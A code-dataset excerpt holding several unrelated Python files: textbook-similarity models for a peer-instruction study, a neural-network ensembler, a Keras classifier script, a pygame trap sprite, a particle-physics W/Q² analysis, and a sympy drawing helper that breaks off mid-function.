text\n\n\ndef get_questions_df(discipline):\n\n if discipline in [\"Physics\", \"Chemistry\"]:\n fp = os.path.join(BASE_DIR, os.pardir, \"all_questions.csv\")\n df_q = pd.read_csv(fp)\n\n elif discipline == \"Ethics\":\n\n data_dir = os.path.join(BASE_DIR, os.pardir, \"data_harvardx\")\n\n fp = os.path.join(data_dir, \"dalite_20161101.csv\")\n df = pd.read_csv(fp)\n df_q1 = df[[\"assignment_id\", \"question_id\", \"question_text\"]].drop_duplicates(\n [\"assignment_id\", \"question_id\"]\n )\n\n files = [\n f\n for f in os.listdir(os.path.join(data_dir, \"video-text\"))\n if not f.startswith(\".\") and \"post\" not in f\n ]\n results = []\n for fn in files:\n d = {}\n d[\"assignment_id\"] = fn.replace(\".txt\", \"\").split(\"_\")[0]\n fp = os.path.join(data_dir, \"video-text\", fn)\n keyname = \"text\"\n with open(fp, \"r\") as f:\n d[keyname] = f.read()\n results.append(d)\n\n df_q = pd.DataFrame(results)\n\n files = [\n f\n for f in os.listdir(os.path.join(data_dir, \"video-text\"))\n if not f.startswith(\".\") and \"post\" in f\n ]\n results = []\n for fn in files:\n d = {}\n d[\"assignment_id\"] = fn.replace(\".txt\", \"\").split(\"_\")[0]\n fp = os.path.join(data_dir, \"video-text\", fn)\n keyname = \"expert_rationale\"\n with open(fp, \"r\") as f:\n d[keyname] = f.read()\n results.append(d)\n\n df_q = df_q.merge(pd.DataFrame(results), on=\"assignment_id\").sort_values(\n \"assignment_id\"\n )\n df_q[\"text\"] = (\n df_q[\"text\"]\n .str.replace(\"\\[MUSIC\\]\", \"\")\n .str.replace(\"\\[...\\]\", \"\")\n .str.replace(\"SPEAKER: \", \"\")\n .str.replace(\"SPEAKER 1: \", \"\")\n .str.replace(\"PROFESSOR: \", \"\")\n .str.replace(\"\\[Music\\]\", \"\")\n )\n\n df_q[\"expert_rationale\"] = (\n df_q[\"expert_rationale\"]\n .str.replace(\"MICHAEL SANDEL: \", \"\")\n .str.replace(\"MICHEAL SANDEL: \", \"\")\n .str.replace(\"MICHAEL J. SANDEL: \", \"\")\n .str.replace(\"PROF. Michael Sandel: \", \"\")\n .str.replace(\"Professor Sandel: \", \"\")\n .str.replace(\"PROFESSOR: \", \"\")\n .str.replace(\"SPEAKER 1: \", \"\")\n .str.replace(\"SPEAKER: \", \"\")\n )\n\n df_q = df_q.merge(df_q1, on=\"assignment_id\", how=\"outer\")\n df_q[\"text\"] = (\n df_q[\"text\"].astype(str) + \" \" + df_q[\"question_text\"].astype(str)\n )\n\n df_q.loc[df_q[\"question_text\"].isna(), \"question_text\"] = df_q.loc[\n df_q[\"question_text\"].isna(), \"text\"\n ]\n df_q[\"question_id\"] = df_q[\"question_id\"].fillna(0).astype(int)\n\n df_q[\"topic\"] = (\n df_q[\"question_text\"]\n .str.strip(\"[?.,]\")\n .apply(lambda x: max(x.split(), key=len))\n )\n df_q[\"title\"] = df_q[\"question_id\"].astype(str) + \"_\" + df_q[\"topic\"]\n\n df_q = df_q.fillna(\" \")\n\n df_q[\"text\"] = df_q[\"text\"].apply(clean_text)\n\n df_q[\"expert_rationale\"] = df_q[\"expert_rationale\"].apply(clean_text)\n return df_q\n\n\ndef book_corpus_reader(discipline, model_name=\"doc2vec\"):\n \"\"\"\n Arguments:\n ----------\n discipline -> str\n model_name -> str; optional\n\n Returns:\n --------\n generator of either:\n - gensim.doc2vec.TaggedDocument\n - if model==\"lsi\" : lists of tokens for each document, lemmatized,\n with stopwords and numeric tokens removed\n \"\"\"\n books = OPENSTAX_TEXTBOOK_DISCIPLINES[discipline]\n fnidx = -1\n for book in books:\n book_dir = os.path.join(BASE_DIR, os.pardir, \"textbooks\", discipline, book)\n files = [f for f in os.listdir(book_dir) if not \"key-terms\" in f]\n files.sort()\n for fp in files:\n fp = os.path.join(book_dir, fp)\n with open(fp, \"r\") as f:\n for i, line in enumerate(f):\n fnidx += 1\n tokens = [\n token.lemma_.lower()\n for token in nlp(line)\n if not token.is_punct and token.is_alpha and not token.is_stop\n ]\n if model_name == \"lsi\":\n yield \" \".join(tokens)\n else:\n f_id = f\"{os.path.basename(fp)}_{i}_{fnidx}\"\n yield gensim.models.doc2vec.TaggedDocument(tokens, [f_id])\n\n\ndef build_similarity_models(\n discipline, save=True, population=\"switchers\", output_dir_name=\"exp2\"\n):\n \"\"\"\n Arguments:\n ----------\n discipline -> str\n\n Returns:\n --------\n model_lsi : trained gensim.LsiModel\n model_d2v : trained gensim.models.Doc2Vec\n dictionary : gensim.Dictionary\n corpus : list of BoW represenetations\n documents : textbook as list of docs\n tagged_documents : list of doc2vec TaggedDocuments\n \"\"\"\n print(f\"1 - reading textbook {discipline}\")\n documents = list(book_corpus_reader(discipline, model_name=\"lsi\"))\n\n print(f\"2 - building list of doc2vec TaggedDocuments\")\n tagged_documents = list(book_corpus_reader(discipline))\n\n print(f\"3 - train Doc2Vec model\")\n model_d2v = gensim.models.doc2vec.Doc2Vec(vector_size=50, min_count=2, epochs=40)\n model_d2v.build_vocab(tagged_documents)\n model_d2v.train(\n tagged_documents, total_examples=model_d2v.corpus_count, epochs=model_d2v.epochs\n )\n\n print(f\"3 - frequency distribution of words\")\n w2c = {}\n for item in model_d2v.wv.index_to_key:\n if item not in nlp.Defaults.stop_words:\n w2c[item] = model_d2v.wv.get_vecattr(item, \"count\")\n\n print(f\"4 - build documents list for Lsi\")\n texts = [\n [\n word\n for word in document.lower().split()\n if word not in nlp.Defaults.stop_words and w2c.get(word, 0) > 1\n ]\n for document in documents\n ]\n dictionary = gensim.corpora.Dictionary(texts)\n corpus = [dictionary.doc2bow(text) for text in texts]\n tfidf = gensim.models.TfidfModel(corpus)\n corpus_tfidf=tfidf[corpus]\n\n print(\n \"5 - train lsi model with {len(documents)} documents and {len(w2c)} unique content words\"\n )\n model_lsi = gensim.models.LsiModel(corpus_tfidf, id2word=dictionary, num_topics=200)\n\n models_dict = {\n \"Doc2Vec\": {\"model\": model_d2v, \"tagged_documents\": tagged_documents},\n \"Lsi\": {\n \"model\": model_lsi,\n \"dictionary\": dictionary,\n \"corpus\": corpus_tfidf,\n \"documents\": documents,\n },\n }\n\n fp = os.path.join(\n BASE_DIR, \"tmp\", output_dir_name, discipline, population, \"models_dict.pkl\"\n )\n with open(fp, \"wb\") as f:\n pickle.dump(models_dict, f)\n return models_dict\n\n\ndef get_reference_texts(topic, discipline, models_dict):\n \"\"\"\n Arguments:\n ----------\n - topic (question title) -> str\n - discipline -> str\n - models_dict -> dict with keys \"Lsi\" and \"Doc2Vec\"\n e.g. models_dict = build_similarity_models(discipline)\n\n\n Returns:\n --------\n - similar_reference_texts -> dict of lists of reference passages from OpenStax text that are deemed similar to\n topic prompt+expert_rationale+image_alt_text, using Lsi and Doc2Vec models\n \"\"\"\n df_q = get_questions_df(discipline=discipline)\n if discipline in [\"Physics\", \"Chemistry\"]:\n df_q[\"text_all\"] = df_q[[\"text\", \"expert_rationale\", \"image_alt_text\"]].apply(\n lambda x: f\"{x['text']}. {x['expert_rationale']}. {x['image_alt_text']}\", axis=1\n )\n else:\n df_q[\"text_all\"] = df_q[[\"text\", \"expert_rationale\"]].apply(\n lambda x: f\"{x['text']}. {x['expert_rationale']}.\", axis=1\n )\n q = df_q[df_q[\"title\"] == topic][\"text_all\"].iat[0]\n\n q_tokens = [token.text for token in nlp(q) if token.is_alpha and not token.is_punct]\n\n similar_reference_texts = {}\n\n # most similar docs : LSI\n model_key = \"Lsi\"\n vec_bow = models_dict[model_key][\"dictionary\"].doc2bow(q_tokens)\n vec_lsi = models_dict[model_key][\"model\"][vec_bow]\n corpus = models_dict[model_key][\"corpus\"]\n index = gensim.similarities.MatrixSimilarity(\n models_dict[model_key][\"model\"][corpus]\n )\n sims = index[vec_lsi]\n\n sims = index[vec_lsi]\n sims = sorted(enumerate(sims), key=lambda item: -item[1])\n\n similar_reference_texts[model_key] = []\n for doc_position, doc_score in sims[0:N_DOCS]:\n # if doc_score >= MIN_SIM_SCORE:\n similar_reference_texts[model_key].append(\n models_dict[model_key][\"documents\"][doc_position]\n )\n\n # most similar docs : Doc2Vec\n model_key = \"Doc2Vec\"\n\n model_d2v = models_dict[model_key][\"model\"]\n model_d2v_tagged_docs = models_dict[model_key][\"tagged_documents\"]\n inferred_vector = model_d2v.infer_vector(q_tokens)\n sims = model_d2v.dv.most_similar([inferred_vector], topn=len(model_d2v.dv))\n # sims = [s for s in sims if s[1] >= MIN_SIM_SCORE]\n\n similar_reference_texts[model_key] = [\n {\n \"name\": s[0],\n \"text\": \" \".join(\n [x[0] for x in model_d2v_tagged_docs if x[1][0] == s[0]][0]\n ),\n }\n for s in sims[0:N_DOCS]\n ]\n\n return similar_reference_texts\n","repo_name":"sameerbhatnagar/convincingness","sub_path":"code/feature_extraction_reference_texts.py","file_name":"feature_extraction_reference_texts.py","file_ext":"py","file_size_in_byte":10037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10726106816","text":"import pandas as pd\nfrom collections import OrderedDict\nimport logging\nimport numpy as np\nfrom sklearn.metrics import mean_squared_error\nfrom os.path import join\nimport pickle\n\n__author__ = \"Matthew Dirks\"\n\nrmse = lambda arr1, arr2: np.sqrt(mean_squared_error(arr1, arr2))\n\ndef flatten(l):\n\t\"\"\" Takes a list of lists and returns a single list containing all the elements.\n\te.g. [[1,2],[3,4]] becomes [1,2,3,4]\n\t\"\"\"\n\tflat_list = [item for sublist in l for item in sublist]\n\treturn flat_list\n\nclass Ensembler:\n\tdef __init__(self):\n\t\tself.metadata_of_models = OrderedDict()\n\n\tdef record_metadata_for_run(self, ith_run, run_result):\n\t\tself.metadata_of_models[ith_run] = run_result\n\n\tdef get_epochs(self):\n\t\t\"\"\" This info used to plot events on loss history plot \"\"\"\n\t\treturn [model_metadata['epoch'] for model_metadata in self.metadata_of_models.values()]\n\n\tdef make_final(self, target_columns_in_use):\n\t\t\"\"\" compute mean predictions for each instance from the collection (ensemble)\n\t\tof models' predictions. And return data for saving and plotting. \"\"\"\n\t\tlogger = logging.getLogger('spectra_ml')\n\n\t\tn_runs = len(self.metadata_of_models)\n\n\t\tlogger.info(f'Ensembler collected {n_runs} models. Computing the ensemble now...')\n\n\t\t# collect ensemble data\n\t\tif (n_runs == 0):\n\t\t\t# no models were saved! This is bad.\n\t\t\traise(Exception('Ensembler has 0 models to work with. Cannot proceed.'))\n\n\t\t# every run picks a random dev set. Will combine train and dev together\n\t\tsets_to_evaluate = ['test','test_CV','train','dev']\n\t\tfirst_predictions_dict = self.metadata_of_models[0]['predictions_dict']\n\t\tassert all([which_set in first_predictions_dict.keys() for which_set in sets_to_evaluate])\n\n\t\t# get data from first run...\n\t\t# (and combine across sets)\n\t\t# (just the 'set' and target columns)\n\t\tdf = pd.concat([first_predictions_dict[which_set] for which_set in sets_to_evaluate], axis=0)[['set']+target_columns_in_use]\n\t\tassert df.index.name == 'sampleId'\n\n\t\t# rename \"train\" and \"dev\" to \"train_or_dev\"\n\t\tdf.loc[df['set'].isin(['train', 'dev']), 'set'] = 'train_or_dev'\n\n\t\t# then get the predictions from each run\n\t\tfor run_idx, metadata in self.metadata_of_models.items():\n\t\t\t# combine data across sets\n\t\t\tdf2 = pd.concat([metadata['predictions_dict'][which_set] for which_set in sets_to_evaluate], axis=0)\n\n\t\t\t# rename \"train\" and \"dev\" to \"train_or_dev\"\n\t\t\tdf2.loc[df2['set'].isin(['train', 'dev']), 'set'] = 'train_or_dev'\n\n\t\t\t# sanity check: making sure the data joins properly\n\t\t\tassert (df[['set']+target_columns_in_use].sort_index() == df2[['set']+target_columns_in_use].sort_index()).all().all()\n\n\t\t\t# add the run_idx to the column name (existing column name is in \"TARGET_pred\" format)\n\t\t\told_column_names = [f'{target}_pred' for target in target_columns_in_use]\n\t\t\tnew_column_names = [f'run{run_idx}:{target}_pred' for target in target_columns_in_use]\n\t\t\tdf2.rename(columns=dict(zip(old_column_names, new_column_names)), inplace=True)\n\n\t\t\t# add columns to existing df\n\t\t\tdf = df.join(df2[new_column_names])\n\n\t\t# calculate ensemble's predictions (the average) and other stats for each target\n\t\tstats_df = df[['set']+target_columns_in_use].copy()\n\t\tfor target in target_columns_in_use:\n\t\t\t# get predictions for target\n\t\t\tper_run_pred_columns = [f'run{run_idx}:{target}_pred' for run_idx in self.metadata_of_models.keys()]\n\t\t\tpredictions = df[per_run_pred_columns]\n\n\t\t\t# calc stats\n\t\t\tstats_df[f'{target}_pred'] = predictions.mean(axis=1)\n\t\t\tstats_df[f'{target}_min'] = predictions.min(axis=1)\n\t\t\tstats_df[f'{target}_max'] = predictions.max(axis=1)\n\t\t\tstats_df[f'{target}_std'] = predictions.std(axis=1)\n\n\t\tto_save = {\n\t\t\t'df': stats_df,\n\t\t\t'target_columns': target_columns_in_use,\n\n\t\t\t# NOTE: plotting functions hardcoded to use f'{target}_pred' format. If you change it here, plotting functions will need to change too\n\t\t\t'prediction_columns': [f'{target}_pred' for target in target_columns_in_use],\n\n\t\t\t# also save individual predictions from each model of the ensemble - for easy post-analysis\n\t\t\t'ensemble_runs_df': df,\n\t\t}\n\n\t\treturn to_save\n\n\n\tdef get_ensemble_RMSE(self, _set, target):\n\t\t\"\"\" Get the ensemble's score for _set and target\n\t\t(the ensemble is built using training runs completed thus far)\n\t\t\"\"\"\n\n\t\t# get predictions\n\t\tdf = self.make_final([target])['df']\n\n\t\t# calc prediction accuracy\n\t\tset_df = df[df['set']==_set]\n\t\tRMSE = rmse(set_df[target], set_df[f'{target}_pred'])\n\n\t\treturn RMSE\n\n\tdef trigger_short_circuit(self, ensemble_short_circuit):\n\t\t\"\"\" Short-circuit training based on criteria supplied, if any.\n\t\t\n\t\tReturns:\n\t\t\tTrue if training should abort.\n\t\t\"\"\"\n\t\tif (ensemble_short_circuit is not None):\n\t\t\tlogger = logging.getLogger('spectra_ml')\n\n\t\t\tn_runs_completed = len(self.metadata_of_models)\n\n\t\t\tfor settings_dict in ensemble_short_circuit:\n\t\t\t\t# e.g. settings_dict may be {'at_n_runs': 10, 'RMSE_needed': 0.8, 'target': 'DM', 'set': 'dev'}\n\n\t\t\t\t# Check if required number of runs have completed at this point\n\t\t\t\tif (settings_dict['at_n_runs'] == n_runs_completed):\n\t\t\t\t\tlogger.debug(f'DEBUG INFO FOR SHORT CIRCUIT: at_n_runs = n_runs_completed = {n_runs_completed}')\n\n\t\t\t\t\t# Check if current ensemble RMSE meets requirement\n\t\t\t\t\tRMSE = self.get_ensemble_RMSE(settings_dict['set'], settings_dict['target'])\n\t\t\t\t\tlogger.debug(f'DEBUG INFO FOR SHORT CIRCUIT: RMSE={RMSE}, RMSE_needed={settings_dict[\"RMSE_needed\"]}')\n\t\t\t\t\tif (RMSE > settings_dict['RMSE_needed']):\n\t\t\t\t\t\t# requirement not satisfied - abort\n\t\t\t\t\t\treturn True\n\n\n\t\treturn False\n","repo_name":"skylogic004/spectroscopy-neural-network-2","sub_path":"spectra_ml/components/ensembling.py","file_name":"ensembling.py","file_ext":"py","file_size_in_byte":5470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17185264874","text":"import matplotlib.pyplot as plt\r\nimport os\r\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense\r\nfrom keras.wrappers.scikit_learn import KerasClassifier\r\nfrom keras.utils import np_utils\r\nfrom tensorflow.keras.optimizers import SGD\r\nfrom tensorflow.keras.optimizers import Adam\r\nfrom tensorflow.keras.optimizers import Adagrad\r\nfrom tensorflow.keras.optimizers import RMSprop\r\nfrom tensorflow.keras.optimizers import Adadelta\r\nfrom sklearn.model_selection import GridSearchCV\r\nfrom keras.regularizers import l2\r\nimport time\r\n\r\n\r\ndef custom_activation(x):\r\n return x\r\n\r\n\"\"\"Function scale uses the methods of normalization,centering and standardization to reduce big differences between values of the same feature\"\"\"\r\ndef scale(data_input,mode=\"Normalize\"):\r\n cols = len(data_input[0,:])\r\n data_input = np.float64(data_input)\r\n if mode == \"Normalize\":\r\n for i in range(cols):\r\n m = max(data_input[:,i])\r\n if m != 0: data_input[:,i] = np.divide(data_input[:,i],m)\r\n elif mode == \"Standardize\":\r\n for i in range(cols):\r\n if data_input[:, i].std() != 0:\r\n data_input[:, i] = np.divide(np.subtract(data_input[:, i], data_input[:, i].mean()),data_input[:, i].std())\r\n else:\r\n data_input[:, i] = np.subtract(data_input[:, i], data_input[:, i].mean())\r\n elif mode == \"Centering\":\r\n for i in range(cols):\r\n data_input[:, i] = np.subtract(data_input[:, i], data_input[:, i].mean())\r\n else:\r\n print(\"The mode you have entered is invalid. Try using 'Normalize' or 'Standardize' or 'Centering'\")\r\n exit(1)\r\n return data_input\r\n\r\n\r\nmodel = Sequential()\r\nmodel.add(Dense(9, input_dim=5, activation=custom_activation)) #,kernel_regularizer=l2(L2)\r\nmodel.add(Dense(4, activation=custom_activation)) #,kernel_regularizer=l2(L2)\r\nmodel.add(Dense(3, activation='softmax'))\r\noptimizer = Adagrad(learning_rate=0.1) #,momentum=momentum\r\n\"\"\"we have two model.compile below. The first uses CE loss function and the other uses MSE\"\"\"\r\nmodel.compile(loss='categorical_crossentropy', optimizer=optimizer, metrics=['accuracy'])\r\n\r\n\"\"\"end\"\"\"\r\nstart = time.time() #begin timer\r\n\r\n\"\"\"Pre-processing\"\"\"\r\ntrainDF = pd.read_csv(\"NoAccelNoCurrentAll.csv\")\r\ntestDF = pd.read_csv(\"NoAccelNoCurrentTestAll.csv\")\r\n\r\ntrain_input = trainDF.iloc[:,1:].values\r\ntrain_output = trainDF.iloc[:,0].values\r\ntest_input = testDF.iloc[:,1:].values\r\ntest_output = testDF.iloc[:,0].values\r\n\r\nprint(\"oxi\")\r\ntrain_input = scale(train_input,'Standardize')\r\ntest_input = scale(test_input,'Standardize')\r\n\r\n\r\ntrainEN = np_utils.to_categorical(train_output).astype(float) #Encode training output to vectors of 0 and 1\r\ntestEN = np_utils.to_categorical(test_output).astype(float) #Encode testing output to vectors of 0 and 1\r\n\r\n\r\n\r\n\"\"\"end of pre-processing\"\"\"\r\n\r\n\"\"\"Creating our architecture\"\"\"\r\n\r\n\r\nANN_model = model.fit(train_input, trainEN, epochs=25, batch_size=75, verbose=0)\r\n\r\n\r\nend = time.time()\r\n\r\nweight = model.get_weights()\r\nnp.savetxt('weight.csv', weight, fmt='%s', delimiter=',')\r\n\r\n\"\"\"End of model\"\"\"\r\n\r\n\"\"\"Plot accuracy - loss\"\"\"\r\nhistory = ANN_model.history\r\n\r\nplt.plot(history['accuracy'])\r\nplt.plot(history['loss'])\r\nplt.title('My model')\r\nplt.ylabel('Accuracy - Loss')\r\nplt.xlabel('epoch')\r\nplt.legend(['accuracy', 'loss'], loc='upper left')\r\n\r\nmy_path = os.path.dirname(os.path.abspath(__file__))\r\nplt.savefig(my_path + '\\Results\\TestSet18\\epochs25batch75\\Graph12.png')\r\nplt.show()\r\n\"\"\"End of plotting\"\"\"\r\n\r\n\"\"\"Evaluate model in a completely new dataset\"\"\"\r\n\r\nAccuracy = history['accuracy'][-1]\r\n\r\nPrediction_Test = model.predict(test_input)\r\nright = 0\r\nfor i in range(len(Prediction_Test)):\r\n temp = 0\r\n counter = 0\r\n for j in Prediction_Test[i]:\r\n if j > temp:\r\n temp = j\r\n prediction = counter\r\n counter += 1\r\n if test_output[i] == prediction:\r\n right += 1\r\n\r\nAccuracy_Test = right / len(Prediction_Test)\r\n\r\n\r\n\"\"\"End of Evaluation\"\"\"\r\n\r\n\"\"\"Print results for training accuracy and hyperparameters used. Also display the timer.\"\"\"\r\n\r\nprint(\"Accuracy of train set is %.2f\"%(Accuracy*100) , \"%\" )\r\n\r\nprint(\"Accuracy of test set is %.2f\"%(Accuracy_Test*100) , \"%\" )\r\n\r\nprint(\"Total time estimated: {0}\".format(end-start))\r\n\r\n\r\n\r\n\"\"\"End\"\"\"\r\n\r\n","repo_name":"JohnVasilakopoulos/Digital-Twin-Stepper-Motor","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4398,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"5285794486","text":"import pygame\n\nfrom auxiliar import Auxiliar\n\ndef landed(self):\n self.fall_count =0\n self.y_vel = 0\n self.jump_count = 0\n \ndef hit_head(self):\n self.count = 0\n self.y_vel *= -1\n\ndef handle_vertical_collision(player,objects,dy):\n collided_objects = []\n for obj in objects:\n if pygame.sprite.collide_mask(player,obj):\n if dy > 0:\n player.rect.bottom = obj.rect.top\n player.landed()\n elif dy < 0 :\n player.rect.top = obj.rect.bottom\n player.hit_head()\n\n collided_objects.append(obj)\n\n return collided_objects\n\n\nclass Object(pygame.sprite.Sprite):\n def __init__(self,x,y,w,h,name=None):\n super().__init__()\n self.rect = pygame.Rect(x,y,w,h)\n self.image = pygame.Surface((w,h),pygame.SRCALPHA)\n self.width = w\n self.height = h\n self.name = name\n\n# ---------------------- ---------------------------\n# clase para aplicar trampas\nclass Fire(Object):\n ANIMATION_DELAY = 3\n\n def __init__(self, x, y, width, height):\n super().__init__(x, y, width, height, \"fire\")\n self.fire = Auxiliar.getSurfaceFromSeparateFiles(\"images/caracters/enemies/ork_sword/IDLE/trap_1 (4).png\", 1, 8, step=1,scale=2.5, w=width, h=height)\n self.image = self.fire[0]\n self.mask = pygame.mask.from_surface(self.image)\n self.animation_count = 0\n self.animation_name = \"off\"\n def check_colision(self, jugador):\n if self.rect.colliderect(jugador.rect): # Verificar colisión entre rectángulos\n if pygame.sprite.collide_mask(self, jugador): # Verificar colisión precisa con máscaras\n # Colisión detectada entre el enemigo y el jugador\n # Realizar acciones adicionales según sea necesario\n print(\"¡Colisión detectada!\")\n # Ejemplo: Reducir la vida del jugador\n jugador.lives -= 1\n \n\n\n def on(self):\n self.animation_name = \"on\"\n\n def off(self):\n self.animation_name = \"off\"\n\n def loop(self):\n self.animation_count += 1\n\n self.rect = self.image.get_rect(topleft=(self.rect.x, self.rect.y))\n self.mask = pygame.mask.from_surface(self.image)\n\n if self.animation_count // self.ANIMATION_DELAY > len(self.fire) - 1:\n self.animation_count = 0\n \n def draw(self, surface):\n sprites = self.fire\n sprite_index = (self.animation_count // self.ANIMATION_DELAY) % len(sprites)\n self.image = sprites[sprite_index]\n\n surface.blit(self.image, self.rect)\n\n","repo_name":"Mariano-Pozo/pozoMariano-pygame-tp-final","sub_path":"trap.py","file_name":"trap.py","file_ext":"py","file_size_in_byte":2622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14074000277","text":"#!/usr/bin/env python\n# %%\nfrom __future__ import print_function\n\nimport sys\nimport time\nfrom collections import defaultdict\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom scipy.optimize import curve_fit\n\nfrom hipopy import LorentzVector, hipo_reader\n\nSECTORS = 7\nBEAM_E = 2.2\nMASS_ELEC = 0.000511\n\n\ndef GetSector(pindex, sector):\n sec = defaultdict(list)\n for i in xrange(len(pindex)):\n sec[pindex[i]].append(sector[i])\n try:\n return sec[0][0]\n except:\n return 0\n\n\ndef gaus(x, a, x0, sigma):\n return a * np.exp(-(x - x0)**2 / (2 * sigma**2))\n\n\ndef Q2_calc(_e_mu, _e_mu_prime):\n \"\"\"Retruns Q^2 value: q^mu^2 = (e^mu - e^mu')^2 = -Q^2.\"\"\"\n _q_mu = (_e_mu - _e_mu_prime)\n return -_q_mu.Mag2\n\n\ndef W_calc(_e_mu, _e_mu_prime):\n \"\"\"Returns W: Gotten from s channel [(gamma - P)^2 == s == w^2], Sqrt[M_p^2 - Q^2 + 2 M_p gamma].\"\"\"\n _q_mu = (_e_mu - _e_mu_prime)\n _p_target = LorentzVector(0.0, 0.0, 0.0, mass=0.93827)\n return (_p_target + _q_mu).Mag\n\n\ndef process(filenames):\n events = 0\n num = 0\n e_mu = LorentzVector(0.0, 0.0, BEAM_E, energy=BEAM_E)\n for f in filenames:\n reader = hipo_reader(f)\n while reader.next():\n events += 1\n\n print(\"Processing {} Events\".format(events))\n W = np.ones(shape=(SECTORS, events * 2)) * np.nan\n Q2 = np.ones(shape=(SECTORS, events * 2)) * np.nan\n\n for f in filenames:\n reader = hipo_reader(f)\n pid = reader.getIntNode(u\"REC::Particle\", u\"pid\")\n px = reader.getFloatNode(u\"REC::Particle\", u\"px\")\n py = reader.getFloatNode(u\"REC::Particle\", u\"py\")\n pz = reader.getFloatNode(u\"REC::Particle\", u\"pz\")\n vx = reader.getFloatNode(u\"REC::Particle\", u\"vx\")\n vy = reader.getFloatNode(u\"REC::Particle\", u\"vy\")\n vz = reader.getFloatNode(u\"REC::Particle\", u\"vz\")\n charge = reader.getInt8Node(u\"REC::Particle\", u\"charge\")\n beta = reader.getFloatNode(u\"REC::Particle\", u\"beta\")\n\n track_pindex = reader.getInt16Node(u\"REC::Track\", u\"pindex\")\n track_sector = reader.getInt8Node(u\"REC::Track\", u\"sector\")\n\n cal_pindex = reader.getInt16Node(u\"REC::Calorimeter\", u\"pindex\")\n cal_sector = reader.getInt8Node(u\"REC::Calorimeter\", u\"sector\")\n\n while reader.next():\n if len(pid) == 0:\n continue\n num += 1\n sec = GetSector(track_pindex, track_sector)\n e_mu_prime = LorentzVector(px[0], py[0], pz[0], mass=MASS_ELEC)\n W[sec][num] = W_calc(e_mu, e_mu_prime)\n Q2[sec][num] = Q2_calc(e_mu, e_mu_prime)\n\n return events, W, Q2\n\n\n# %%\nstart = time.time()\nevents, W, Q2 = process(sys.argv[1:])\nend = time.time()\nprint((end - start), \"Sec\")\nprint(((end - start) / events), \"time/event\")\nprint((events / (end - start)), \"Hz\")\n\n# %%\nfig_WQ2, axs_WQ2 = plt.subplots(2, 6, sharey='row', figsize=(16, 10))\nfor s in range(1, SECTORS):\n i = s - 1\n W_s = W[s]\n Q2_s = Q2[s]\n W_s = W_s[~np.isnan(W_s)]\n Q2_s = Q2_s[~np.isnan(Q2_s)]\n h, b, _ = axs_WQ2[0, i].hist(W_s, bins=500, range=(0.0, 2.2), color='darkblue',\n histtype='step', fill=True)\n\n y, bins = np.histogram(W_s, range=(0.8, 1.1), bins=500)\n x = (bins[:-1] + bins[1:]) / 2\n popt, pcov = curve_fit(gaus, x, y, p0=[1.0, 1.0, 1.0], maxfev=8000)\n popt[0] = max(h)\n axs_WQ2[0, i].plot(x, gaus(x, *popt), \"red\",\n label=\"$\\mu$ = {0:.4f}\\n$\\sigma$ = {1:.4f}\".format(popt[1], popt[2]), linewidth=2)\n axs_WQ2[0, i].legend()\n\n axs_WQ2[1, i].hist2d(W_s, Q2_s, bins=500, range=((0.0, 2.2), (0, 1.0)))\n axs_WQ2[0, i].set_title(\"Sector {0:d} W vs $Q^2$\".format(s))\n\n# %%\nfig_WQ22, axs_WQ22 = plt.subplots(2, sharex='col', figsize=(16, 10))\nW_s = W[:]\nQ2_s = Q2[:]\nW_s = W_s[~np.isnan(W_s)]\nQ2_s = Q2_s[~np.isnan(Q2_s)]\nh, b, _ = axs_WQ22[0].hist(W_s, bins=500, range=(0.0, 2.2), color='darkblue',\n histtype='step', fill=True)\ny, bins = np.histogram(W_s, range=(0.8, 1.1), bins=500, density=True)\nx = (bins[:-1] + bins[1:]) / 2\npopt, pcov = curve_fit(gaus, x, y, p0=[1.0, 1.0, 1.0])\npopt[0] = max(h)\naxs_WQ22[0].plot(x, gaus(x, *popt), \"red\",\n label=\"$\\mu$ = {0:.4f}\\n$\\sigma$ = {1:.4f}\".format(popt[1], popt[2]), linewidth=2)\naxs_WQ22[0].legend()\n\naxs_WQ22[1].hist2d(W_s, Q2_s, bins=500, range=((0.0, 2.2), (0, 1.0)))\naxs_WQ22[0].set_title(\"All Sectors W vs $Q^2$\".format(s))\n\nfig_WQ2.savefig(\"WvsQ2_bySector.pdf\")\nfig_WQ22.savefig(\"WvsQ2.pdf\")\n","repo_name":"tylern4/hipopy","sub_path":"examples/inclusive.py","file_name":"inclusive.py","file_ext":"py","file_size_in_byte":4520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"69810825708","text":"from __future__ import absolute_import\nfrom numpy import arange\nimport sympy as sym\nfrom sympy import geometry as geo\n\ndef add_geometry(drawing, g, move_to=False, step=1):\n ''' draw sympy equations '''\n if isinstance(g, geo.Ellipse):\n drawing.ellipse(g.center.x, g.center.y, g.hradius, g.vradius)\n elif hasattr(g, 'vertices'):\n try:\n if move_to:\n drawing.move_to(g.vertices[0].x, g.vertices[0].y)\n else:\n drawing.line_to(g.vertices[0].x, g.vertices[0].y)\n for vertex in g.vertices[1:]:\n drawing.line_to(vertex.x, vertex.y)\n except AttributeError:\n if move_to:\n drawing.move_to(g.vertices[0][0], g.vertices[0][1])\n else:\n drawing.line_to(g.vertices[0][0], g.vertices[0][1])\n for vertex in g.vertices[1:]:\n drawing.line_to(vertex[0], vertex[1])\n elif hasattr(g, 'points'):\n if move_to:\n drawing.move_to(g.points[0].x, g.points[0].y)\n else:\n drawing.line_to(g.points[0].x, g.points[0].y)\n for point in g.points[1:]:\n drawing.line_to(point.x, point.y)\n elif hasattr(g, 'x') and hasattr(g, 'y'):\n if move_to:\n drawing.move_to(g.x, g.y)\n else:\n drawing.line_to(g.x, g.y)\n elif hasattr(g, 'p1') and hasattr(g, 'p2'):\n if move_to:\n drawing.move_to(g.p1.x, g.py.y)\n else:\n drawing.line_to(g.p1.x, g.p1.y)\n elif hasattr(g, 'functions'):\n has_tried_move = not move_to\n for x_pos in arange(g.limits[1], g.limits[2]+1, step):\n if not 